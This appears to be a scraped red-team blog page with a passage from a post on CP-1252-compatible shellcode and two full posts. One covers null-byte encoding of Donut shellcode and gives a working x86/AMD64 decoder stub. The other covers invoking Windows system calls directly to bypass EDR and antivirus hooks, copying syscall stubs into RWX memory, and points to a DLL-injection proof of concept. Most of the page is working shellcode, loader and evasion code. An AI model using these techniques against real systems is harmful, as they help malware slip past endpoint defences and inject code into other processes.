"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x53"                 /* push  rbx                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xa7"                 /* cmpsd                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x1c\x00"             /* sbb   al, 0                  */
"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xc1\x00\x18"         /* rol   dword ptr [rax], 0x18  */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */

Load 0xFF000700 into EAX. The Carry Flag (CF) is set using SAHF. Then subtract 0xFF000700 + CF using SBB, which sets EAX to -1 or 0xFFFFFFFF.

"\xb8\x00\x07\x00\xff" /* mov   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x9e"                 /* sahf                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x1d\x00\x07\x00\xff" /* sbb   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */

Two problems: SAHF is a byte we can’t use (0x9E) and even if we could, the ADD after the SAHF instruction modifies the flags register, resulting in EAX being set to 0 or -1. The result depends on the byte stored in address rbp contains and the value of CL.

Adding -1 will subtract 1 from the variable EAX contains the address of.

"\x6a\x00"             /* push  0                    */
"\x54"                 /* push  rsp                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x58"                 /* pop   rax                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x83\x00\xff"         /* add   dword  [eax], -1  */
"\x58"                 /* pop   rax                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */

Works fine, but because 0x83 converts to a double-byte encoding, we can’t use it.

Set the Carry Flag (CF) with STC. Subtract 0 + CF from AL using SBB AL, 0, which sets AL to 0xFF. Create a variable set to 0 on the stack. Load the address of that variable into rdi. Store AL in variable four times before loading into RAX. Doesn’t work once the addition after STC is executed.

"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1c\x00"             /* sbb   al, 0               */
"\x6a\x00"             /* push  0                   */
"\x54"                 /* push  rsp                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x5f"                 /* pop   rdi                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

The next snippet simply copies the value of RCX to RAX. It’s overcomplicated and the POP QWORD instruction might be useful in some scenario. I just didn’t find it useful.

"\x6a\x00"             /* push  0              */
"\x54"                 /* push  rsp            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x58"                 /* pop   rax            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x51"                 /* push  rcx            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x8f\x00"             /* pop   qword [rax]    */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x5f"                 /* pop   rax            */

Adding registers is a problem, specifically when a carry occurs. Any operation on a 32-bit register automatically clears the upper 32-bits of a 64-bit register, so to perform addition and subtraction on addresses, ADD and SUB of 32-bit registers isn’t useful.

    push   0
    pop    rcx
    xnop
    push   rbp              ; save rbp      
    xnop
    ; 1. ====================================
    push   0                ; store 0 as X
    push   rsp              ; store &X
    xnop
    pop    rbp              ; load &X
    xnop
    ; 2. ====================================
    mov    eax, 0xFF001200  ; load 0xFF001200
    add    [rbp], ah        ; add 0x12
    adc    al, 0            ; AL = CF
    push   rbp              ; store &X
    xnop
    push   rsp              ; store &&X
    xnop
    pop    rax              ; load &&X
    xnop
    inc    dword[rax]       ; &X++
    pop    rbp
    xnop
    add    [rbp], al        ; add CF
    ; 3. ====================================

Finally, one that may or may not be useful. Imagine you have a shellcode and you want to reconstruct it in memory before executing. If the address of table 1 is in RAX, table 2 in RSI and R8 is zero, this next instruction might be useful. Every even byte of the shellcode would be stored in one table with every odd byte stored in another. Then at runtime, we combine the two. The only problem is getting R8 to zero because anything that uses it requires a REX prefix. I’m leaving here in the event R8 is already zero..

    ; read byte from table 2
    lodsb
    add [rbp], cl
    add byte[rax+r8+1], al   ; copy to table 1
    add [rbp], cl
    
    lodsb
    add [rbp], cl
    add byte[rax+r8+3], al
    add [rbp], cl
    
    lodsb
    add [rbp], cl
    add byte[rax+r8+5], al
    add [rbp], cl
    
    ; and so on..
    
    ; execute
    push rax
    ret

Using the above instruction to add 8-bits to 32-bit word.

    ; step 1
    push   rax              ; save pointer
    add    byte[rbp], cl
    add    byte[rax+r8], bl ; A[0] += B[0]
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 2
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24   
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[1] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 3
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24    
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[2] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl

    ; step 4
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24    
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[3] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 5
    rol    dword[rax], 24
    add    byte[rbp], cl

As you can see, it’s a mess to try simulate instructions instead of just writing the code to memory and executing that way…or use CF_UNICODETEXT for copying to the clipboard. 😉

Posted in assembly, injection, process injection, programming, redteam, security, shellcode, windows | Tagged amd64, cp1252, shellcode, windows, x86 | 2 Comments

Shellcode: Encoding Null Bytes Faster With Escape Sequences

Posted on June 26, 2020 by odzhan

Introduction

Quick post about a common problem removing null bytes in the loader generated by Donut. Replacing opcodes that contain null bytes with equivalent snippets is enough to solve the problem for a shellcode of no more than a few hundred bytes. It’s also possible to automate using encoders found in msfvenom and pwntools. However, the problem most users experience is when the loader generated by Donut is a few hundred kilobytes or even a few megabytes! This post demonstrates how to use escape sequences to facilitate faster encoding of null bytes. Maybe “escape codes” is a better description? You can find a PoC encoder here, which can be used to add an x86/AMD64 decoder to a shellcode generated by Donut.

XOR Cipher

Readers will be aware of the eXclusive-OR (XOR) cipher and its extensive use as a component or building block in many cryptographic primitives. It’s also a popular choice for obfuscating shellcode and specifically removing null bytes. In the past, the following code in C is what I’d probably use to find a suitable key. It will work with keys of any length, but is slow as hell for anything more than 24-Bits.

int find_xor_key(
  const void *inbuf, u32 inlen, 
  void *outbuf, int outlen) 
{
    int i, j, keylen=1;
    u8  *in = (u8*)inbuf, *key=(u8*)outbuf;
    
    // initialize key
    for(i=0; i<outlen; i++) {
      key[i] = (i < keylen) ? 0 : -1;
    }
    
    // while keylen is less than max key requested
    while(keylen < outlen) {
      // xor data with current key
      for(i=0; i<inlen; i++) {
        // if the result of xor is zero. end loop
        if((in[i] ^ key[i % keylen]) == 0) break;
      }
      // if we processed all data successfully
      if(i == inlen) {
        // return current key and its length
        return keylen;
      }
      // otherwise, update the key
      for(i=0; ; i++) {
        if(++key[i]) break;
      }
      // update the key length
      if(i == keylen) keylen++;
    }
    // return nothing found
    return 0;
}

The following function can be used to test it and works relatively fast for something that’s compact, like 1KB, but sucks for anything > 3072 bytes, which I admit is unusual for shellcode.

void test_key(void) {
    int i, keylen;
    u8  key[8], data[1024];
    
    srand(time(0));
    
    // fill buffer with pseudo-random bytes
    for(i=0; i<sizeof(data); i++) {
      data[i] = rand();
    }
    // try find a suitable XOR key for the data
    keylen = find_xor_key(data, sizeof(data), key, sizeof(key));
    
    printf("Suitable key %sfound.\n\n", 
      keylen ? "" : "could not be ");
    
    if(keylen) {
      printf("Key length : %i\nKey        : ", keylen);
      while(keylen--) {
        printf("%02x ", key[keylen]);
      }
      putchar('\n');
    }
}

find_xor_key() could be re-written to use multiple threads and this would speed up the search. You might even be able to use a GPU or cluster of computers, but the overall problem isn’t finding a key. We’re not trying to crack ciphertext. All we want to do is encode and later decode null bytes, and for the Donut loader, this approach is very inefficient.

Encoding Algorithm

Escape sequences have been used in computing since the 1970s and most of you will already be familiar with them. I’m not sure if I’m using the correct terminology for what I describe next, but hopefully you’ll understand why I did. Textual encoding algorithms like Base64, Ascii85 and BasE91 were considered first of course. And Qkumba wrote a very cool base64 decoder that uses just ASCII characters that I was very tempted to use. In the end, using an escape code to indicate a null byte is simpler to implement.

Read a byte from the input file or stream and assign to X.
Assign X plus 1 to Y.
If Y is not 0 or 1, goto step 6.
Save the escape sequence 0x01 to the output file or stream.
XOR X with predefined 8-Bit key K, goto step 7.
Add 1 to X.
Save X to the output file or stream.
Repeat step 1-7 until EOF.

Although I use an XOR cipher in step 5, it could be replaced with something else.

static
void nullz_encode(FILE *in, FILE *out) {
    char c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // adding one is just an example
      t = c + 1;
      // is the result 0(avoid) or 1(escape)?
      if(t == 0 || t == 1) {
        // write escape sequence
        putc(0x01, out);
        // The XOR is an optional step.
        // Avoid using 0x00 or 0xFF with XOR!
        putc(c ^ NULLZ_KEY, out);
      } else {
        // save byte plus 1
        putc(c + 1, out);
      }
    }
}

Decoding Algorithm

Read a byte from the input file or stream and assign to X.
If X is not an escape sequence 0x01, goto step 5.
Read a byte from the input file or stream and assign to X.
XOR X with predefined 8-Bit key K used for encoding, goto step 6.
Subtract 1 from X.
Save X to the output file or stream.
Repeat steps 1-6 until EOF.

static
void nullz_decode(FILE *in, FILE *out) {
    char c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if this is an escape sequence
      if(c == 0x01) {
        // read next byte and XOR it
        c = getc(in);
        // The XOR is an optional step.
        putc(c ^ NULLZ_KEY, out);
      } else {
        // else subtract byte
        putc(c - 1, out);
      }
    }
}

x86/AMD64 assembly

This assembly is compatible with both 32-Bit and 64-bit modes. It expects to run from RWX memory, so YMMV with this. If you want to execute from RX memory only, then this will require allocation of memory on the stack.

    bits   32
    
    %define NULLZ_KEY 0x4D
    
nullz_decode:
_nullz_decode:
    jmp    init_code
load_code:
    pop    esi
    lodsd                    ; load original length of data
    xor    eax, 0x12345678   ; change to 32-bit key    
    xchg   eax, ecx
    push   esi               ; save pointer to code on stack
    pop    edi               ; 
    push   esi
decode_main:
    lodsb                    ; read a byte
    dec    al                ; c - 1
    jnz    save_byte
    lodsb                    ; read next byte
    xor    al, NULLZ_KEY     ; c ^= NULLZ_KEY
save_byte:
    stosb                    ; save in buffer
    loop   decode_main
    ret                      ; execute shellcode
init_code:
    call   load_code
    ; XOR encoded shellcode goes here..

Building the Loader

Allocate memory to hold the decoder, 32-bits for the original length of input file and file data itself.
Copy the decoder to memory.
Set the key in decoder that will decrypt the original length. The offset of this value is defined by NULLZ_LEN.
Set the original length, encrypted with XOR, right after the decoder.
Set input file data right after the original length.
Save memory to file.

An option to update the XOR key is left up to you.

// compatible with x86 and x86-64
char NULLZ_DECODER[] = {
  /* 0000 */ "\xeb\x17"             /* jmp   0x19            */
  /* 0002 */ "\x5e"                 /* pop   esi             */
  /* 0003 */ "\xad"                 /* lodsd                 */
#define NULLZ_LEN 5
  /* 0004 */ "\x35\x78\x56\x34\x12" /* xor   eax, 0x12345678 */
  /* 0009 */ "\x91"                 /* xchg  eax, ecx        */
  /* 000A */ "\x56"                 /* push  esi             */
  /* 000B */ "\x5f"                 /* pop   edi             */
  /* 000C */ "\x56"                 /* push  esi             */
  /* 000D */ "\xac"                 /* lodsb                 */
  /* 000E */ "\xfe\xc8"             /* dec   al              */
  /* 0010 */ "\x75\x03"             /* jne   0x15            */
  /* 0012 */ "\xac"                 /* lodsb                 */
  /* 0013 */ "\x34\x4d"             /* xor   al, 0x4d        */
  /* 0015 */ "\xaa"                 /* stosb                 */
  /* 0016 */ "\xe2\xf5"             /* loop  0xd             */
  /* 0018 */ "\xc3"                 /* ret                   */
  /* 0019 */ "\xe8\xe4\xff\xff\xff" /* call  2               */
};

Summary

Before settling with escape sequences, I examined a number of other ways that null bytes might be encoded and decoded at runtime by a shellcode.

Initially, I thought of byte substitution, which is a non-linear operation used by legacy block ciphers. Scrapped that idea.

Experimented with match referencing, which is very common for lossless compression algorithms. Wrote a few bits of code to process files and then calculate the change in size. For every null byte found in a file, save the position and length before passing the null bytes to a function F for modification. An involution, like an XOR is fine to use as F. Then encode the offset and length using elias gamma2 codes. The change in file size was approx. 4% and I thought this might be the best way. It requires more code and is more complicated, but certainly an option.

Thought about bit tags. Essentially using 1-Bit to indicate whether a byte is encoded or not. Change in file size would be ~12% since every byte would require 1-Bit. This eventually led to escape sequences, which I think is the best approach.

Posted in assembly, donut, security, shellcode, windows | Tagged encoding, null bytes, shellcode | 1 Comment

Invoking System Calls and Windows Debugger Engine

Posted on June 1, 2020 by odzhan

Introduction

Quick post about Windows System calls that I forgot about working on after the release of Dumpert by Cn33liz last year, which is described in this post. Typically, EDR and AV set hooks on Win32 API or NT wrapper functions to detect and mitigate against malicious activity. Dumpert attempts to bypass any user-level hooks by invoking system calls directly. It first queries the operating system version via RtlGetVersion and then selects the applicable code stubs to execute. SysWhispers generates header/ASM files by extracting the system call numbers from the code stubs in NTDLL.dll and evilsocket also demonstrated how to do this many years ago. @FuzzySec and @TheWover have also implemented dynamic invocation of system calls after remapping NTDLL in Sharpsploit, which you can read about in their Bluehat presentation.

Using system calls on Windows to interact with the kernel has always been problematic because the numbers assigned for each kernel function change between the versions released. Just after Cn33liz published Dumpert, I thought of how invocation might be improved without using assembly and there are lots of ways, but consider at least three for now. The first method, which is probably the simplest and safest, maps NTDLL.dll into executable memory and resolves the address of any system call via the Export Address Table (EAT) before executing. This is relatively simple to implement. The second approach maps NTDLL.dll into read-only memory and uses a disassembler, or at the very least, a length disassembler to extract the system call number. The third will also map NTDLL.dll into read-only memory, copy the code stub to an executable buffer before invoking. The length of the stub is read from the exception directory. Overcomplicated, perhaps, and I did consider a few disassembly libraries for the second method, but just to save time settled with the Windows Debugger Engine, which has a built-in disassembler already.

A PoC to inject a DLL into remote process can be found here. It doesn’t use a disassembler, but because it uses the exception directory to locate the end of a system call, it will only work with 64-bit processes.

Windows Debugging Engine

Disassembling code via the engine requires a live process. Thankfully it’s possible to attach the debugger to the local process in noninvasive mode. You can just map NTDLL into executable memory and invoke any system call from there, however, I wanted an excuse to use the debugging engine. 😛 lde.c, lde.h

LDE::LDE() {
    CHAR path[MAX_PATH];
    
    ctrl = NULL;
    clnt = NULL;
    // create a debugging client
    hr = DebugCreate(__uuidof(IDebugClient), (void**)&clnt);
    if(hr == S_OK) {
      // get the control interface
      hr = clnt->QueryInterface(__uuidof(IDebugControl3), (void**)&ctrl);
      if(hr == S_OK) {
        // attach to existing process
        hr = clnt->AttachProcess(NULL, 
          GetProcessId(GetCurrentProcess()), 
          DEBUG_ATTACH_NONINVASIVE | DEBUG_ATTACH_NONINVASIVE_NO_SUSPEND);
        if(hr == S_OK) {
          hr = ctrl->WaitForEvent(DEBUG_WAIT_DEFAULT, INFINITE);
        }
      }
    }
    ExpandEnvironmentStrings("%SystemRoot%\\system32\\NTDLL.dll", path, MAX_PATH);
    // open file
    file = CreateFile(path, 
      GENERIC_READ, FILE_SHARE_READ, NULL, 
      OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
      
    if(file == INVALID_HANDLE_VALUE) return;
    
    // map file
    map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, NULL);
    if(map == NULL) return;
    
    // create read only view of map
    mem = (LPBYTE)MapViewOfFile(map, FILE_MAP_READ, 0, 0, NULL);
}

WinDbg has a command to disassemble a complete function called uf (Unassemble Function). Internally, WinDbg builds a Control-flow Graph (CFG) to map the full function before displaying the disassembly of each code block. You can execute a command like uf via the Execute method and so long as you’ve setup IDebugOutputCallbacks, you can capture the disassembly that way. I considered using a CFG to implement something similar to uf, which you can if you wish. The system calls on my own build of Windows 10 have at the most, one branch, so I scrapped the idea of using a CFG or executing uf. With NTDLL mapped, you can use something like the following to resolve the address of an exported API.

FARPROC LDE::GetProcAddress(LPCSTR lpProcName) {
    PIMAGE_DATA_DIRECTORY   dir;
    PIMAGE_EXPORT_DIRECTORY exp;
    DWORD                   rva, ofs, cnt;
    PCHAR                   str;
    PDWORD                  adr, sym;
    PWORD                   ord;
    
    if(mem == NULL || lpProcName == NULL) return NULL;
    
    // get pointer to image directories for NTDLL
    dir = Dirs();
    
    // no exports? exit
    rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if(rva == 0) return NULL;
    
    ofs = rva2ofs(rva);
    if(ofs == -1) return NULL;
    
    // no exported symbols? exit
    exp = (PIMAGE_EXPORT_DIRECTORY)(ofs + mem);
    cnt = exp->NumberOfNames;
    if(cnt == 0) return NULL;
    
    // read the array containing address of api names
    ofs = rva2ofs(exp->AddressOfNames);        
    if(ofs == -1) return NULL;
    sym = (PDWORD)(ofs + mem);

    // read the array containing address of api
    ofs = rva2ofs(exp->AddressOfFunctions);        
    if(ofs == -1) return NULL;
    adr = (PDWORD)(ofs + mem);
    
    // read the array containing list of ordinals
    ofs = rva2ofs(exp->AddressOfNameOrdinals);
    if(ofs == -1) return NULL;
    ord = (PWORD)(ofs + mem);
    
    // scan symbol array for api string
    do {
      str = (PCHAR)(rva2ofs(sym[cnt - 1]) + mem);
      // found it?
      if(lstrcmp(str, lpProcName) == 0) {
        // return the address
        return (FARPROC)(rva2ofs(adr[ord[cnt - 1]]) + mem);
      }
    } while (--cnt);
    return NULL;
}

The following will use the Disassemble method to show the code. You can also use it to inspect bytes if you wanted to extract the system call number. The beginning and end of the system call is read from the Exception directory.

bool LDE::DisassembleSyscall(LPCSTR lpSyscallName) {
    ULONG64                       ofs, start=0, end=0, addr;
    PIMAGE_DOS_HEADER             dos;
    PIMAGE_NT_HEADERS             nt;
    PIMAGE_DATA_DIRECTORY         dir;
    PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
    DWORD                         i, rva;
    CHAR                          buf[LDE_MAX_STR];
    HRESULT                       hr;
    ULONG                         len;
    
    // resolve address of function in NTDLL
    addr = (ULONG64)GetProcAddress(lpSyscallName);
    if(addr == NULL) return false;
    
    // get pointer to image directories
    dir = Dirs();
    
    // no exception directory? exit
    rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
    if(rva == 0) return false;
    
    ofs = rva2ofs(rva);
    if(ofs == -1) return false;
    
    rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);

    // for each runtime function (there might be a better way??)
    for(i=0; rf[i].BeginAddress != 0; i++) {
      // is it our system call?
      start = rva2ofs(rf[i].BeginAddress) + (ULONG64)mem;
      if(start == addr) {
        // save end and exit search
        end = rva2ofs(rf[i].EndAddress) + (ULONG64)mem;
        break;
      }
    }
    
    if(start != 0 && end != 0) {
      while(start < end) {
        hr = ctrl->Disassemble(
          start, 0, buf, LDE_MAX_STR, &len, &start);
          
        if(hr != S_OK) break;
        
        printf("%s", buf);
      }
    }
    return true;
}

The following code will disassemble the system call.

int main(int argc, char *argv[]) {
    LDE *lde;
    
    if(argc != 2) {
      printf("usage: dis <system call name>\n");
      return 0;
    }
    
    // create length disassembly engine
    lde = new LDE();
      
    lde->DisassembleSyscall(argv[1]);

    delete lde;
    
    return 0;
}

Just to illustrate disassembly of NtCreateThreadEx and NtWriteVirtualMemory. The address of SharedUserData doesn’t change and therefore doesn’t require fixups to the code just because it’s been mapped somewhere else.

Invoking

Simply copy the code for the system call to memory allocated by VirtualAlloc with PAGE_EXECUTE_READWRITE permissions. Rewriting the above code, we have something like the following.

LPVOID LDE::GetSyscallStub(LPCSTR lpSyscallName) {
    ULONG64                       ofs, start=0, end=0, addr;
    PIMAGE_DOS_HEADER             dos;
    PIMAGE_NT_HEADERS             nt;
    PIMAGE_DATA_DIRECTORY         dir;
    PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
    DWORD                         i, rva;
    SIZE_T                        len;
    LPVOID                        cs = NULL;
    
    // resolve address of function in NTDLL
    addr = (ULONG64)GetProcAddress(lpSyscallName);
    if(addr == NULL) return NULL;
    
    // get pointer to image directories
    dir = Dirs();
    
    // no exception directory? exit
    rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
    if(rva == 0) return NULL;
    
    ofs = rva2ofs(rva);
    if(ofs == -1) return NULL;
    
    rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);

    // for each runtime function (there might be a better way??)
    for(i=0; rf[i].BeginAddress != 0; i++) {
      // is it our system call?
      start = rva2ofs(rf[i].BeginAddress) + (ULONG64)mem;
      if(start == addr) {
        // save the end and calculate length
        end = rva2ofs(rf[i].EndAddress) + (ULONG64)mem;
        len = (SIZE_T) (end - start);
        
        // allocate RWX memory
        cs = VirtualAlloc(NULL, len,  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if(cs != NULL) {
          // copy stub to memory
          CopyMemory(cs, (const void*)start, len);
        }
        break;
      }
    }
    // return pointer to code stub
    return cs;
}

Summary

Invoking system calls via remapping of the NTDLL.dll is of course the simplest approach. A lightweight LDE and CFG with no dependencies on external libraries would be useful for other Red Teaming activities like hooking API or even detecting hooked functions. It could also be used for locating GetProcAddress without touching the Export Address Table (EAT) or Import Address Table (IAT). However, GetSyscallStub demonstrates that you don’t need a disassembler just to read the code stub.

Posted in assembly, programming, redteam, security, windows | Tagged av, disassembler, edr, red teams, system calls, windbg | 1 Comment

Introduction

Substitution Box

Summary

Introduction

References

Observations

Table

Introduction

References

Observations

Locating Table

Summary

Introduction

Involutions

Random Shuffling

Keyed/Seeded/Deterministic Shuffling

Summary

References

Execute /bin/sh

Execute Command

Bind Shell

Reverse Connect Shell

Further Reading

Contents

1. Introduction

2. Dynamic Function Table List

3. Event Tracing

4. DLL Notifications

5. Secure Memory

6. Configuration Manager (CM)

7. Vectored Exception Handling (VEH)

8. Windows Error Reporting (WER)

8.1 PEB Header Block

8.2 Recovery Information

8.3 Gathers

8.4 Custom Meta Data

8.5 Runtime DLL

8.6 Dump Collections

8.7 Heap Main Header

Contents

1. Introduction

2. Shellcode

3. Environment Variables

4. Command Line

5. Window Title

6. Runtime Data

1. Introduction

2. Edit Controls

3. Writing CP-1252 Compatible Code

3.1 Initialization

3.2 Set RAX to 0

3.3 Set RAX to 1

3.4 Set RAX to -1

3.5 Load and Store Data

3.6 Two Byte Instructions

3.7 Prefix Codes

4. Generating Shellcode

5. Injecting and Executing Shellcode

6. Demonstration

7. Encoding Arbitrary Data

7.1 Encoding

7.2 Decoding

8. Acknowledgements

9. Further Research

10. Code Scrapheap

Introduction

XOR Cipher

Encoding Algorithm

Decoding Algorithm

x86/AMD64 assembly

Building the Loader

Summary

Introduction

Windows Debugging Engine

Invoking

Summary

Recent Posts